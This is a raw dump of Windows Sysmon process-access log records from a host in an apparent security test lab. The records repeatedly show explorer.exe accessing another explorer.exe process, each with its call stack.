22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696229Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696228Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696227Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696226Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696225Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696224Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696223Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696222Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696221Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696220Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696219Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696218Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696217Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696216Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696215Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696214Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696213Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696212Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696211Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696210Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696209Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696208Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696207Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696206Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696205Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696204Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696203Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696202Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 